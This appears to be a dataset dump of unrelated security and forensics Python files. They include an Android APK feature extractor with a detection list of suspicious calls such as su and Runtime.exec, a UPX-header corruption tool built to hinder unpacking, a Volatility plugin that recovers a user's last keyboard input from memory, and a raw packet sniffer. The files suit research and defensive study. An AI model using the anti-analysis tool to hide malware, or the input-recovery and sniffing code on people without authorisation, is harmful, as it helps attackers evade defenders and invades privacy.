self._apk_data['sdk_version'] = str(self._a.get_min_sdk_version())
self._apk_data['features'] = self._a.get_elements('uses-feature', 'android:name')
self._apk_data['files'] = self._a.get_files()
self._apk_data['activities'] = self._a.get_activities()
self._apk_data['providers'] = self._a.get_providers()
self._apk_data['req_permissions'] = self._a.get_permissions()
self._apk_data['receivers'] = self._a.get_receivers()
self._apk_data['services'] = self._a.get_services()
self._apk_data['libraries'] = self._a.get_libraries()
self._apk_data['intent_filters'] = self._a.get_elements('action', 'android:name') + self._a.get_elements('category', 'android:name')
def __extract_dx_features(self, category, paths):
self._apk_data[category] = dict()
for path in paths:
class_name = path.get_dst(self._cm)[0]
method_name = path.get_dst(self._cm)[1]
if method_name.find('init') > 0:
method_name = 'init'
method_name = class_name[1:] + '->' + method_name
self._apk_data[category][method_name] = 1
def __extract_native_calls(self):
self._apk_data['native_calls'] = dict()
for method in self._d.get_methods():
# this condition is copied from show_NativeCalls()
if method.get_access_flags() & 0x100:
class_name = method.get_class_name()
method_name = method.get_name()
if method_name.find('init') > 0:
method_name = 'init'
method_name = class_name[1:] + '->' + method_name
self._apk_data['native_calls'][method_name] = 1
def __extract_urls(self):
# get urls
ip_regex = '(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
url_regex = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|\
(?:%[0-9a-fA-F][0-9a-fA-F]))+'
self._apk_data['urls'] = dict()
for string in self._strings:
# search for ip addresses
ip = re.search(ip_regex, string)
if None != ip:
ip = ip.group()
self._apk_data['urls'][ip] = 1
# search for urls
url = re.search(url_regex, string)
if None != url:
url = urllib.quote(url.group(), '>:/?')
self._apk_data['urls'][url] = 1
# add hostname
o = urlparse(url)
hostname = o.netloc
self._apk_data['urls'][hostname] = 1
def __extract_suspicious_calls(self):
sus_calls = ['Ljava/net/HttpURLconnection;->setRequestMethod',
'Ljava/net/HttpURLconnection',
'getExternalStorageDirectory',
'getSimCountryIso',
'execHttpRequest',
'sendTextMessage',
'Lorg/apache/http/client/methods/HttpPost',
'getSubscriberId',
'Landroid/telephony/SmsMessage;->getMessageBody',
'getDeviceId',
'getPackageInfo',
'getSystemService',
'getWifiState',
'system/bin/su',
'system/xbin/su',
'setWifiEnabled',
'setWifiDisabled',
'Cipher',
'Ljava/io/IOException;->printStackTrace',
'android/os/Exec',
'Ljava/lang/Runtime;->exec']
sus_calls = dict(zip(sus_calls, np.ones(len(sus_calls))))
self._apk_data['suspicious_calls'] = dict()
for string in self._strings:
for sc in sus_calls:
if string.find(sc) >= 0:
self._apk_data['suspicious_calls'][string] = 1
sus_tuples = [('java/net/HttpURLconnection', 'setRequestMethod'),
('android/telephony/SmsMessage', 'getMessageBody'),
('java/io/IOException', 'printStackTrace'),
('java/lang/Runtime', 'exec')]
for tpl in sus_tuples:
class_name = tpl[0][1:]
name = tpl[1]
paths = self._dx.tainted_packages.search_methods(class_name, name, '')
for path in paths:
method = path.get_dst(self._cm)
method_full = method[0] + '->' + method[1]
self._apk_data['suspicious_calls'][method_full] = 1
def __str__(self):
if self._out['format'] == 'xml':
out_str = self.__create_xml_string()
else:
out_str = self.__get_feature_strings()
return out_str
def __get_feature_strings(self):
feat_str = ''
for category in self._out['categories']:
if category not in self._apk_data:
continue
for item in self._apk_data[category]:
feat_str += '\n{0}::{1}'\
.format(category, item[:self._out['feat_len']])
return feat_str[1:]
def __create_xml_string(self):
xml_str = '<static>'
xml_str += self.__get_info_string()
for category in self._out['categories']:
xml_str += self.__get_category_string(category)
xml_str += '\n</static>'
doc = parseString("" + xml_str + "")
xml = doc.toxml().replace('<static>', '\n<static>')
return xml
def __get_info_string(self):
istr = '\n\t<info>'
istr += '\n\t\t<sha256>' + str(self._apk_data['sha256']) + '</sha256>'
istr += '\n\t\t<md5>' + str(self._apk_data['md5']) + '</md5>'
istr += '\n\t\t<apk_name>' + self._apk_data['apk_name'] + '</apk_name>'
istr += '\n\t\t<package_name>' + self._apk_data['package_name'] + '</package_name>'
istr += '\n\t\t<sdk_version>' + self._apk_data['sdk_version'] + '</sdk_version>'
istr += '\n\t</info>'
return istr
def __get_category_string(self, category):
cat_str = '\n\t<{}>'.format(category)
for item in self._apk_data[category]:
field = self.__get_field_name(category)
cat_str += '\n\t\t<{0}>{1}</{0}>'\
.format(field, item[:self._out['feat_len']])
cat_str += '\n\t</{}>'.format(category)
return cat_str
@staticmethod
def __get_field_name(category):
if category.endswith('ies'):
return category[:-3] + 'y'
else:
return category[:-1] | 36.797297 | 140 | 0.533655 |
cybersecurity-penetration-testing | import argparse
import csv
import json
import logging
import sys
import os
import urllib2
import unix_converter as unix
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20150920'
__version__ = 0.03
__description__ = 'This scripts downloads address transactions using blockchain.info public APIs'
def main(address, output_dir):
"""
The main function handles coordinating logic
:param address: The Bitcoin Address to lookup
:param output_dir: The output directory to write the CSV results
:return: Nothing
"""
logging.info('Initiated program for {} address'.format(address))
logging.info('Obtaining JSON structured data from blockchain.info')
raw_account = getAddress(address)
account = json.loads(raw_account.read())
printHeader(account)
parseTransactions(account, output_dir)
def getAddress(address):
"""
The getAddress function uses the blockchain.info Data API to pull
pull down account information and transactions for address of interest
:param address: The Bitcoin Address to lookup
:return: The response of the url request
"""
url = 'https://blockchain.info/address/{}?format=json'.format(address)
try:
return urllib2.urlopen(url)
except urllib2.URLError, e:
logging.error('URL Error for {}'.format(url))
if hasattr(e, 'code') and hasattr(e, 'headers'):
logging.debug('{}: {}'.format(e.code, e.reason))
logging.debug('{}'.format(e.headers))
print 'Received URL Error for {}'.format(url)
logging.info('Program exiting...')
sys.exit(1)
def parseTransactions(account, output_dir):
"""
The parseTransactions function appends transaction data into a
nested list structure so it can be successfully used by the csvWriter function.
:param account: The JSON decoded account and transaction data
:param output_dir: The output directory to write the CSV results
:return: Nothing
"""
msg = 'Parsing transactions...'
logging.info(msg)
print msg
transactions = []
for i, tx in enumerate(account['txs']):
transaction = []
outputs = {}
inputs = getInputs(tx)
transaction.append(i)
transaction.append(unix.unixConverter(tx['time']))
transaction.append(tx['hash'])
transaction.append(inputs)
for output in tx['out']:
outputs[output['addr']] = output['value'] * 10**-8
transaction.append('\n'.join(outputs.keys()))
transaction.append('\n'.join(str(v) for v in outputs.values()))
transaction.append('{:.8f}'.format(sum(outputs.values())))
transactions.append(transaction)
csvWriter(transactions, output_dir)
def printHeader(account):
"""
The printHeader function prints overall header information
containing basic address information.
:param account: The JSON decoded account and transaction data
:return: Nothing
"""
print 'Address:', account['address']
print 'Current Balance: {:.8f} BTC'.format(account['final_balance'] * 10**-8)
print 'Total Sent: {:.8f} BTC'.format(account['total_sent'] * 10**-8)
print 'Total Received: {:.8f} BTC'.format(account['total_received'] * 10**-8)
print 'Number of Transactions:', account['n_tx']
print '{:=^22}\n'.format('')
def getInputs(tx):
"""
The getInputs function is a small helper function that returns
input addresses for a given transaction
:param tx: A single instance of a Bitcoin transaction
:return: inputs, a list of inputs
"""
inputs = []
for input_addr in tx['inputs']:
inputs.append(input_addr['prev_out']['addr'])
if len(inputs) > 1:
input_string = '\n'.join(inputs)
else:
input_string = ''.join(inputs)
return input_string
def csvWriter(data, output_dir):
"""
The csvWriter function writes transaction data into a CSV file
:param data: The parsed transaction data in nested list
:param output_dir: The output directory to write the CSV results
:return: Nothing
"""
logging.info('Writing output to {}'.format(output_dir))
print 'Writing output.'
headers = ['Index', 'Date', 'Transaction Hash', 'Inputs', 'Outputs', 'Values', 'Total']
try:
with open(output_dir, 'wb') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(headers)
for transaction in data:
writer.writerow(transaction)
csvfile.flush()
csvfile.close()
except IOError, e:
logging.error('Error writing output to {}.\nGenerated message: {}.'.format(e.filename, e.strerror))
print 'Error writing to CSV file. Please check output argument {}'.format(e.filename)
logging.info('Program exiting.')
sys.exit(1)
logging.info('Program exiting.')
print 'Program exiting.'
sys.exit(0)
if __name__ == '__main__':
# Run this code if the script is run from the command line.
parser = argparse.ArgumentParser(description='BTC Address Lookup', version=str(__version__),
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('ADDR', help='Bitcoin Address')
parser.add_argument('OUTPUT', help='Output CSV file')
parser.add_argument('-l', help='Specify log directory. Defaults to current working directory.')
args = parser.parse_args()
# Set up Log
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l) # create log directory path
log_path = os.path.join(args.l, 'btc_addr_lookup.log')
else:
log_path = 'btc_addr_lookup.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='w')
logging.info('Starting Bitcoin Address Lookup v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
# Print Script Information
print '{:=^22}'.format('')
print '{} {}'.format('Bitcoin Address Lookup, ', __version__)
print '{:=^22} \n'.format('')
# Run main program
main(args.ADDR, args.OUTPUT)
| 35.391813 | 107 | 0.641434 |
owtf | """
This plugin does not perform ANY test: The aim is to visit all URLs grabbed so far and build
the transaction log to feed data to other plugins
NOTE: This is an active plugin because it may visit URLs retrieved by vulnerability scanner spiders
which may be considered sensitive or include vulnerability probing
"""
import logging
from owtf.requester.base import requester
from owtf.managers.url import get_urls_to_visit
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Visit URLs found by other tools, some could be sensitive: need permission"
def run(PluginInfo):
urls = get_urls_to_visit()
for url in urls: # This will return only unvisited urls
requester.get_transaction(True, url) # Use cache if possible
Content = "{} URLs were visited".format(str(len(urls)))
logging.info(Content)
return plugin_helper.HtmlString(Content)
| 37.130435 | 99 | 0.762557 |
cybersecurity-penetration-testing | #!/usr/bin/python3
import pefile
import string
import os, sys
def tamperUpx(outfile):
pe = pefile.PE(outfile)
newSectionNames = (
'.text',
'.data',
'.rdata',
'.idata',
'.pdata',
)
num = 0
sectnum = 0
section_table_offset = (pe.DOS_HEADER.e_lfanew + 4 +
pe.FILE_HEADER.sizeof() + pe.FILE_HEADER.SizeOfOptionalHeader)
found = 0
print('Step 1. Renaming UPX sections...')
for sect in pe.sections:
section_offset = section_table_offset + sectnum * 0x28
sectnum += 1
if sect.Name.decode().lower().startswith('upx'):
found += 1
newname = newSectionNames[num].encode() + ((8 - len(newSectionNames[num])) * b'\x00')
print('\tRenamed UPX section ({}) => ({})'.format(
sect.Name.decode(), newSectionNames[num]
))
num += 1
pe.set_bytes_at_offset(section_offset, newname)
print('\nStep 2. Removing obvious indicators...')
pos = pe.__data__.find(b'UPX!')
if pos != -1:
found += 1
print('\tRemoved "UPX!" (UPX_MAGIC_LE32) magic value...')
pe.set_bytes_at_offset(pos, b'\x00' * 4)
prev = pe.__data__[pos-5:pos-1]
if all(chr(c) in string.printable for c in prev):
print('\tRemoved "{}" indicator...'.format(prev.decode()))
pe.set_bytes_at_offset(pos-5, b'\x00' * 4)
print('\nStep 3. Corrupting PackHeader...')
version = pe.__data__[pos + 4]
_format = pe.__data__[pos + 5]
method = pe.__data__[pos + 6]
level = pe.__data__[pos + 7]
print('\tOverwriting metadata (version={}, format={}, method={}, level={})...'.format(
version, _format, method, level
))
pe.set_bytes_at_offset(pos + 4, b'\x00')
pe.set_bytes_at_offset(pos + 5, b'\x00')
pe.set_bytes_at_offset(pos + 6, b'\x00')
pe.set_bytes_at_offset(pos + 7, b'\x00')
#
# Src:
# https://github.com/upx/upx/blob/36670251fdbbf72f6ce165148875d369cae8f415/src/packhead.cpp#L187
# https://github.com/upx/upx/blob/36670251fdbbf72f6ce165148875d369cae8f415/src/stub/src/include/header.S#L33
#
u_adler = pe.get_dword_from_data(pe.__data__, pos + 8)
c_adler = pe.get_dword_from_data(pe.__data__, pos + 12)
u_len = pe.get_dword_from_data(pe.__data__, pos + 16)
c_len = pe.get_dword_from_data(pe.__data__, pos + 20)
origsize = pe.get_dword_from_data(pe.__data__, pos + 24)
filter_id = pe.__data__[pos + 28]
filter_cto = pe.__data__[pos + 29]
unused = pe.__data__[pos + 30]
header_chksum = pe.__data__[pos + 31]
print('\tCorrupting stored lengths and sizes:')
print('\t\t- uncompressed_adler (u_adler): ({} / 0x{:x}) => (0)'.format(u_adler, u_adler))
pe.set_dword_at_offset(pos + 8, 0)
print('\t\t- compressed_adler (c_adler): ({} / 0x{:x}) => (0)'.format(c_adler, c_adler))
pe.set_dword_at_offset(pos + 12, 0)
print('\t\t- uncompressed_len (u_len): ({} / 0x{:x}) => (0)'.format(u_len, u_len))
pe.set_dword_at_offset(pos + 16, 0)
print('\t\t- compressed_len (c_len): ({} / 0x{:x}) => (0)'.format(c_len, c_len))
pe.set_dword_at_offset(pos + 20, 0)
print('\t\t- original file size: ({} / 0x{:x}) => (0)'.format(origsize, origsize))
pe.set_dword_at_offset(pos + 24, 0)
print('\t\t- filter id: ({} / 0x{:x}) => (0)'.format(filter_id, filter_id))
pe.set_bytes_at_offset(pos + 28, b'\x00')
print('\t\t- filter cto: ({} / 0x{:x}) => (0)'.format(filter_cto, filter_cto))
pe.set_bytes_at_offset(pos + 29, b'\x00')
print('\t\t- unused: ({} / 0x{:x}) => (0)'.format(unused, unused))
pe.set_bytes_at_offset(pos + 30, b'\x00')
print('\t\t- header checksum: ({} / 0x{:x}) => (0)'.format(header_chksum, header_chksum))
pe.set_bytes_at_offset(pos + 31, b'\x00')
if found > 0:
pe.parse_sections(section_table_offset)
pe.write(outfile)
print('\n[+] UPX-protected executable corrupted: ' + outfile)
return True
else:
print('\n[-] Input file does not resemble UPX packed executable (or it was already corrupted)')
return False
def main(argv):
print('''
:: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored.
Mariusz Banach / mgeeky, '21
''')
if len(argv) < 2:
print('Usage: ./tamperUpx.py <infile> [outfile]')
infile = argv[1]
outfile = ''
if len(argv) >= 3:
outfile = argv[2]
if not os.path.isfile(infile):
print('[!] Input file does not exist.')
return 1
if len(outfile) > 0:
with open(outfile, 'wb') as f:
with open(infile, 'rb') as g:
f.write(g.read())
else:
outfile = infile
if tamperUpx(outfile):
print('[+] Success. UPX should have some issues decompressing output artifact now.')
if __name__ == '__main__':
main(sys.argv) | 33.986577 | 118 | 0.538949 |
owtf | """
owtf.api.routes
~~~~~~~~~~~~~~~
"""
import tornado.web
from owtf.api.handlers.config import ConfigurationHandler
from owtf.api.handlers.health import HealthCheckHandler
from owtf.api.handlers.index import IndexHandler
from owtf.api.handlers.misc import ErrorDataHandler, DashboardPanelHandler, ProgressBarHandler
from owtf.api.handlers.plugin import PluginDataHandler, PluginNameOutput, PluginOutputHandler
from owtf.api.handlers.base import FileRedirectHandler
from owtf.api.handlers.report import ReportExportHandler
from owtf.api.handlers.session import OWTFSessionHandler
from owtf.api.handlers.targets import TargetConfigHandler, TargetConfigSearchHandler, TargetSeverityChartHandler
from owtf.api.handlers.transactions import (
TransactionDataHandler,
TransactionHrtHandler,
TransactionSearchHandler,
URLDataHandler,
URLSearchHandler,
)
from owtf.api.handlers.work import WorkerHandler, WorklistHandler, WorklistSearchHandler
from owtf.api.handlers.auth import (
LogInHandler,
LogOutHandler,
RegisterHandler,
AccountActivationGenerateHandler,
AccountActivationValidateHandler,
OtpGenerateHandler,
OtpVerifyHandler,
PasswordChangeHandler,
)
from owtf.api.handlers.api_token import ApiTokenGenerateHandler
from owtf.db.session import get_scoped_session
from owtf.models.plugin import Plugin
from owtf.settings import STATIC_ROOT
__all__ = ["API_v1_HANDLERS", "UI_HANDLERS"]
session = get_scoped_session()
plugin_group_re = "(%s)?" % "|".join(Plugin.get_all_plugin_groups(session))
plugin_type_re = "(%s)?" % "|".join(Plugin.get_all_plugin_types(session))
plugin_code_re = "([0-9A-Z\-]+)?"
API_v1_HANDLERS = [
tornado.web.url(r"/api/v1/errors/?([0-9]+)?/?$", ErrorDataHandler, name="errors_api_url"),
tornado.web.url(
r"/api/v1/sessions/?([0-9]+)?/?(activate|add|remove)?/?$", OWTFSessionHandler, name="owtf_sessions_api_url"
),
tornado.web.url(
r"/api/v1/plugins/?" + plugin_group_re + "/?" + plugin_type_re + "/?" + plugin_code_re + "/?$",
PluginDataHandler,
name="plugins_api_url",
),
tornado.web.url(r"/api/v1/plugins/progress/?$", ProgressBarHandler, name="poutput_count"),
tornado.web.url(r"/api/v1/targets/severitychart/?$", TargetSeverityChartHandler, name="targets_severity"),
tornado.web.url(r"/api/v1/targets/search/?$", TargetConfigSearchHandler, name="targets_search_api_url"),
tornado.web.url(r"/api/v1/targets/?([0-9]+)?/?$", TargetConfigHandler, name="targets_api_url"),
tornado.web.url(r"/api/v1/targets/([0-9]+)/urls/?$", URLDataHandler, name="urls_api_url"),
tornado.web.url(r"/api/v1/targets/([0-9]+)/urls/search/?$", URLSearchHandler, name="urls_search_api_url"),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/transactions/?([0-9]+)?/?$", TransactionDataHandler, name="transactions_api_url"
),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/transactions/search/?$", TransactionSearchHandler, name="transactions_search_api_url"
),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/transactions/hrt/?([0-9]+)?/?$",
TransactionHrtHandler,
name="transactions_hrt_api_url",
),
tornado.web.url(
r"/api/v1/targets/([0-9]+)/poutput/?" + plugin_group_re + "/?" + plugin_type_re + "/?" + plugin_code_re + "/?$",
PluginOutputHandler,
name="poutput_api_url",
),
tornado.web.url(r"/api/v1/targets/([0-9]+)/poutput/names/?$", PluginNameOutput, name="plugin_name_api_url"),
tornado.web.url(r"/api/v1/targets/([0-9]+)/export/?$", ReportExportHandler, name="report_export_api_url"),
# The following one url is dummy and actually processed in file server
tornado.web.url(r"/api/v1/workers/?([0-9]+)?/?(abort|pause|resume)?/?$", WorkerHandler, name="workers_api_url"),
tornado.web.url(
r"/api/v1/worklist/?([0-9]+)?/?(pause|resume|delete)?/?$", WorklistHandler, name="worklist_api_url"
),
tornado.web.url(r"/api/v1/worklist/search/?$", WorklistSearchHandler, name="worklist_search_api_url"),
tornado.web.url(r"/api/v1/configuration/?$", ConfigurationHandler, name="configuration_api_url"),
tornado.web.url(r"/api/v1/dashboard/severitypanel/?$", DashboardPanelHandler),
tornado.web.url(r"/api/v1/register/?$", RegisterHandler, name="regisration_api_url"),
tornado.web.url(r"/api/v1/login/?$", LogInHandler, name="login_api_url"),
tornado.web.url(r"/api/v1/logout/?$", LogOutHandler, name="logout_api_url"),
tornado.web.url(r"/api/v1/generate/api_token/?$", ApiTokenGenerateHandler, name="apitokengenerator_api_url"),
tornado.web.url(
r"/api/v1/generate/confirm_email/?$", AccountActivationGenerateHandler, name="confirmpasswordgenerator_api_url"
),
tornado.web.url(
r"/api/v1/verify/confirm_email/([^/]+)?$",
AccountActivationValidateHandler,
name="confirmpasswordverify_api_url",
),
tornado.web.url(r"/api/v1/generate/otp/?$", OtpGenerateHandler, name="otp_generate_api_url"),
tornado.web.url(r"/api/v1/verify/otp/?$", OtpVerifyHandler, name="otp_verify_api_url"),
tornado.web.url(r"/api/v1/new-password/?$", PasswordChangeHandler, name="password_change_api_url"),
]
UI_HANDLERS = [
tornado.web.url(r"/static/(.*)", tornado.web.StaticFileHandler, {"path": STATIC_ROOT}),
tornado.web.url(r"/debug/health/?$", HealthCheckHandler),
tornado.web.url(r"/output_files/(.*)", FileRedirectHandler, name="file_redirect_url"),
tornado.web.url(r"^/(?!api|debug|static|output_files)(.*)$", IndexHandler),
]
| 48.633929 | 120 | 0.691796 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
###################################################################################################
class dalvik_app_lastInput(linux_common.AbstractLinuxCommand):
###################################################################################################
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_PID(self._config)
dalvik.register_option_GDVM_OFFSET(self._config)
self._config.add_option('CLASS_OFFSET', short_option = 'c', default = None,
help = 'This is the offset (in hex) of system class RichInputConnection.java', action = 'store', type = 'str')
###################################################################################################
def calculate(self):
# if no gDvm object offset was specified, use this one
if not self._config.GDVM_OFFSET:
self._config.GDVM_OFFSET = str(0x41b0)
# use linux_pslist plugin to find process address space and ID if not specified
proc_as = None
tasks = linux_pslist.linux_pslist(self._config).calculate()
for task in tasks:
if str(task.comm) == "putmethod.latin":
proc_as = task.get_process_address_space()
self._config.PID = str(task.pid)
break
# use dalvik_loaded_classes plugin to find class offset if not specified
if not self._config.CLASS_OFFSET:
classes = dalvik_loaded_classes.dalvik_loaded_classes(self._config).calculate()
for task, clazz in classes:
if (dalvik.getString(clazz.sourceFile)+"" == "RichInputConnection.java"):
self._config.CLASS_OFFSET = str(hex(clazz.obj_offset))
break
# use dalvik_find_class_instance plugin to find a list of possible class instances
instance = dalvik_find_class_instance.dalvik_find_class_instance(self._config).calculate()
for sysClass, inst in instance:
# get stringBuilder object
stringBuilder = inst.clazz.getJValuebyName(inst, "mCommittedTextBeforeComposingText").Object.dereference_as('Object')
# get superclass object
abstractStringBuilder = stringBuilder.clazz.super.dereference_as('ClassObject')
# array object of super class
charArray = abstractStringBuilder.getJValuebyName(stringBuilder, "value").Object.dereference_as('ArrayObject')
# get length of array object
count = charArray.length
# create string object with content of the array object
text = obj.Object('String', offset = charArray.contents0.obj_offset,
vm = abstractStringBuilder.obj_vm, length = count*2, encoding = "utf16")
yield inst, text
###################################################################################################
def render_text(self, outfd, data):
self.table_header(outfd, [ ("InstanceClass", "13"),
("lastInput", "20")
])
for inst, text in data:
self.table_row( outfd,
hex(inst.obj_offset),
text)
| 50.131868 | 132 | 0.569218 |
Python-Penetration-Testing-Cookbook | import socket
import struct
import textwrap
def get_mac_addr(mac_raw):
byte_str = map('{:02x}'.format, mac_raw)
mac_addr = ':'.join(byte_str).upper()
return mac_addr
def format_multi_line(prefix, string, size=80):
size -= len(prefix)
if isinstance(string, bytes):
string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
if size % 2:
size -= 1
return '\n'.join([prefix + line for line in textwrap.wrap(string, size)])
def ethernet_head(raw_data):
dest, src, prototype = struct.unpack('! 6s 6s H', raw_data[:14])
dest_mac = get_mac_addr(dest)
src_mac = get_mac_addr(src)
proto = socket.htons(prototype)
data = raw_data[14:]
return dest_mac, src_mac, proto, data
def http(raw_data):
try:
data = raw_data.decode('utf-8')
except:
data = raw_data
return data
def icmp_head(raw_data):
packet_type, code, checksum = struct.unpack('! B B H', raw_data[:4])
data = raw_data[4:]
return packet_type, code, checksum, data
def ipv4_head(raw_data):
version_header_length = raw_data[0]
version = version_header_length >> 4
header_length = (version_header_length & 15) * 4
ttl, proto, src, target = struct.unpack('! 8x B B 2x 4s 4s', raw_data[:20])
src = get_ip(src)
target = get_ip(target)
data = raw_data[header_length:]
return version_header_length, version, header_length, ttl, proto, src, target, data
def get_ip(addr):
return '.'.join(map(str, addr))
def tcp_head( raw_data):
(src_port, dest_port, sequence, acknowledgment, offset_reserved_flags) = struct.unpack(
'! H H L L H', raw_data[:14])
offset = (offset_reserved_flags >> 12) * 4
flag_urg = (offset_reserved_flags & 32) >> 5
flag_ack = (offset_reserved_flags & 16) >> 4
flag_psh = (offset_reserved_flags & 8) >> 3
flag_rst = (offset_reserved_flags & 4) >> 2
flag_syn = (offset_reserved_flags & 2) >> 1
flag_fin = offset_reserved_flags & 1
data = raw_data[offset:]
return src_port, dest_port, sequence, acknowledgment, flag_urg, flag_ack, flag_psh, flag_rst, flag_syn, flag_fin, data
def udp_head(raw_data):
src_port, dest_port, size = struct.unpack('! H H 2x H', raw_data[:8])
data = raw_data[8:]
return src_port, dest_port, size, data
def main():
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
while True:
raw_data, addr = s.recvfrom(65535)
eth = ethernet_head(raw_data)
print('\nEthernet Frame:')
print('Destination: {}, Source: {}, Protocol: {}'.format(eth[0], eth[1], eth[2]))
if eth[2] == 8:
ipv4 = ipv4_head(eth[3])
print('\t -' + 'IPv4 Packet:')
print('\t\t -' + 'Version: {}, Header Length: {}, TTL: {},'.format(ipv4[1], ipv4[2], ipv4[3]))
print('\t\t -' + 'Protocol: {}, Source: {}, Target: {}'.format(ipv4[4], ipv4[5], ipv4[6]))
# TCP
if ipv4[4] == 6:
tcp = tcp_head(ipv4[7])
print('\t -' + 'TCP Segment:')
print('\t\t -' + 'Source Port: {}, Destination Port: {}'.format(tcp[0], tcp[1]))
print('\t\t -' + 'Sequence: {}, Acknowledgment: {}'.format(tcp[2], tcp[3]))
print('\t\t -' + 'Flags:')
print('\t\t\t -' + 'URG: {}, ACK: {}, PSH: {}'.format(tcp[4], tcp[5], tcp[6]))
print('\t\t\t -' + 'RST: {}, SYN: {}, FIN:{}'.format(tcp[7], tcp[8], tcp[9]))
if len(tcp[10]) > 0:
# HTTP
if tcp[0] == 80 or tcp[1] == 80:
print('\t\t -' + 'HTTP Data:')
try:
http = http(tcp[10])
http_info = str(http[10]).split('\n')
for line in http_info:
print('\t\t\t' + str(line))
except:
print(format_multi_line('\t\t\t', tcp[10]))
else:
print('\t\t -' + 'TCP Data:')
print(format_multi_line('\t\t\t', tcp[10]))
# ICMP
elif ipv4[4] == 1:
icmp = icmp_head(ipv4[7])
print('\t -' + 'ICMP Packet:')
print('\t\t -' + 'Type: {}, Code: {}, Checksum: {},'.format(icmp[0], icmp[1], icmp[2]))
print('\t\t -' + 'ICMP Data:')
print(format_multi_line('\t\t\t', icmp[3]))
elif ipv4[4] == 17:
udp = udp_head(ipv4[7])
print('\t -' + 'UDP Segment:')
print('\t\t -' + 'Source Port: {}, Destination Port: {}, Length: {}'.format(udp[0], udp[1], udp[2]))
# Other IPv4
else:
print('\t -' + 'Other IPv4 Data:')
print(format_multi_line('\t\t', ipv4[7]))
else:
print('Ethernet Data:')
print(format_multi_line('\t', eth[3]))
main()
| 35.413043 | 122 | 0.5 |
cybersecurity-penetration-testing | '''
Copyright (c) 2016 Python Forensics and Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Revision History
v .95 Beta Initial Release (May 2016)
v .90 Alpha Initial Release Command Line Version (November 2015)
Writter for:
Python 2.6.x or greater (not Python 3.x)
pfDiscover Support File
Includes the FileExaminer Class
'''
# Required Python Import Standard Library Modules
import os # OS Module
import re # Regular Expression Modules
import time # Time Module
import traceback # raceback exception Module
# Psuedo Constants
MAXBUFF = 1024 * 1024 * 16 # 16 Megabytes defines the size of
# of the memory chunks read
# Class: FileExaminer Class
#
# Desc: Handles all methods related to File Based Forensics
# Methods constructor: Initializes the Forensic File Object and Collects Basic Attributes
# File Size
# MAC Times
# Reads file into a buffer
# hashFile: Generates the selected one-way hash of the file
# destructor: Deletes the Forensic File Object
class FileExaminer:
# Constructor
def __init__(self, theFile):
#Attributes of the Object
self.lastError = "OK"
self.mactimes = ["","",""]
self.fileSize = 0
self.fileOpen = False
self.fileType = "unknown"
self.uid = 0
self.gid = 0
self.mountPoint = False
self.fileRead = False
self.md5 = ""
self.sha1 = ""
self.path = theFile
self.sha256 = ""
self.sha512 = ""
self.zipLookup = False
self.emailDict = {} # Create empty dictionaries
self.ssnDict = {}
self.urlDict = {}
self.pwDict = {}
self.ccDict = {}
self.usphDict = {}
self.zipDict = {}
self.zipDB = {}
try:
if os.path.exists(theFile):
# get the file statistics
theFileStat = os.stat(theFile)
# get the MAC Times and store them in a list
self.macTimes = []
self.macTimes.append(time.ctime(theFileStat.st_mtime))
self.macTimes.append(time.ctime(theFileStat.st_atime))
self.macTimes.append(time.ctime(theFileStat.st_ctime))
# get and store the File size
self.fileSize = theFileStat.st_size
# Get and store the ownership information
self.uid = theFileStat.st_uid
self.gid = theFileStat.st_gid
if os.path.isfile(theFile):
self.fileType = "File"
# Is this a real file?
elif os.path.islink(theFile):
self.fileType = "Link"
# Is This filename actually a directory?
elif os.path.isdir(theFile):
self.fileType = "Directory"
else:
self.fileType = "Unknown"
# Is the pathname a mount point?
if os.path.ismount(theFile):
self.mountPoint = True
else:
self.mountPoint = False
# Is the file Accessible for Read?
if os.access(theFile, os.R_OK) and self.fileType == "File":
# Open the file to make sure we can access it
self.fp = open(theFile, 'rb')
self.fileOpen = True
else:
self.fileRead = False
try:
# Required zipdb comma separated value
# file containing zipcode to city lookup
with open("zipdb.csv", 'r') as zipData:
for line in zipData:
line=line.strip()
lineList = line.split(',')
if len(lineList) == 3:
key = lineList[0]
